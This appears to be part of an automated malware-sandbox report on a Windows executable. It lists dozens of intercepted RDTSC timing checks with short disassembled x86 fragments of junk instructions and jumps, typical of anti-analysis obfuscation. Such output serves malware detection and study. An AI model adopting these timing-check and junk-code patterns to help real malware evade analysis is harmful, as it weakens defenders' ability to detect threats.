Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E74AD second address: 5E74B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E77BF second address: 5E77C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E77C3 second address: 5E77C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E7DC3 second address: 5E7DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E7DC7 second address: 5E7DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E85CD second address: 5CEBC6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2192E8588h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FC2192E8588h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+13632EE9h] 0x0000002d call dword ptr [ebp+13631D1Dh] 0x00000033 pushad 0x00000034 jmp 00007FC2192E858Ch 0x00000039 jg 00007FC2192E85A4h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FC2192E8596h 0x00000046 ja 00007FC2192E8586h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5CEBC6 second address: 5CEBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5CEBCA second address: 5CEBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FC2192E8597h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5CEBEB second address: 5CEC13 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC218F099C8h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5CEC13 second address: 5CEC3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8590h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC2192E8591h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A42BF second address: 5A42C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61DFDA second address: 61DFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61DFE0 second address: 61DFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61E46D second address: 61E47D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2192E858Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61E719 second address: 61E71D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5CEBA4 second address: 5CEBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC2192E8596h 0x0000000b ja 00007FC2192E8586h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61E869 second address: 61E874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61E874 second address: 61E879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61E879 second address: 61E88A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC218F099BAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6203D3 second address: 6203D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6203D8 second address: 6203E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC218F099B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6238D0 second address: 6238DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 626091 second address: 626097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 626097 second address: 6260D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop eax 0x00000009 jne 00007FC2192E85A1h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC2192E858Fh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6260D6 second address: 6260DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62A7BC second address: 62A7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62A7C2 second address: 62A7CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC218F099B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62A7CC second address: 62A7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC2192E8586h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62A90D second address: 62A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C8h 0x00000009 jmp 00007FC218F099BDh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62A937 second address: 62A950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E8593h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62A950 second address: 62A954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62A954 second address: 62A958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62AD48 second address: 62AD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62AD56 second address: 62AD79 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2192E8586h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC2192E8594h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62AD79 second address: 62AD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62B1AC second address: 62B1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62B1B0 second address: 62B1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC218F099BEh 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62B1C9 second address: 62B1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62B1CF second address: 62B1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62B42E second address: 62B45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC2192E8586h 0x0000000a popad 0x0000000b jng 00007FC2192E859Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FC2192E8586h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 62B786 second address: 62B78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 63230A second address: 632310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 630FFD second address: 631001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 631001 second address: 63102A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 ja 00007FC2192E8586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC2192E8586h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 631466 second address: 63146C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 63190E second address: 631918 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 631918 second address: 631948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC218F099C2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 631C16 second address: 631C3D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FC2192E8593h 0x0000000c js 00007FC2192E8592h 0x00000012 jbe 00007FC2192E8586h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6321BC second address: 6321C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 630A0C second address: 630A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 630A10 second address: 630A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC218F099D6h 0x0000000c jmp 00007FC218F099C3h 0x00000011 jmp 00007FC218F099BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 630A3C second address: 630A78 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC2192E85A1h 0x00000008 jmp 00007FC2192E8599h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FC2192E858Eh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007FC2192E8586h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6348E7 second address: 6348EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6348EB second address: 6348EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6348EF second address: 6348F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6348F5 second address: 6348FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6348FB second address: 634908 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 634908 second address: 634914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 634914 second address: 634918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 634918 second address: 63491E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 637366 second address: 63737E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 63737E second address: 637394 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC2192E858Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 637394 second address: 63739C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 63739C second address: 6373A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6377C0 second address: 6377C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6377C6 second address: 6377D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 63C421 second address: 63C43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 64179B second address: 6417AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007FC2192E8586h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 640943 second address: 640947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 640E70 second address: 640E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 640E76 second address: 640EA4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC218F099C9h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 js 00007FC218F099C8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 640EA4 second address: 640EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 640EB8 second address: 640EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 641028 second address: 641032 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 641032 second address: 641037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 649460 second address: 649466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 649466 second address: 649481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 649481 second address: 64949D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E8596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 64949D second address: 6494A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 64996D second address: 64997F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FC2192E8586h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FC2192E8586h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 649AE2 second address: 649AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 649AEA second address: 649AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 649AEF second address: 649B18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FC218F099B6h 0x0000000b pop esi 0x0000000c ja 00007FC218F099BCh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 649C68 second address: 649C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 64A7D8 second address: 64A7EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65078B second address: 6507AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6507AA second address: 650810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FC218F099C7h 0x00000014 jmp 00007FC218F099C2h 0x00000019 popad 0x0000001a pushad 0x0000001b jnc 00007FC218F099B6h 0x00000021 jmp 00007FC218F099BBh 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65098F second address: 6509A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2192E858Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6509A0 second address: 6509C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FC218F099B6h 0x00000009 jmp 00007FC218F099C5h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 6509C5 second address: 6509C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65F901 second address: 65F905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65F905 second address: 65F923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65F923 second address: 65F960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC218F099C8h 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FC218F099C9h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65F960 second address: 65F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FC2192E8586h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 65F96F second address: 65F973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
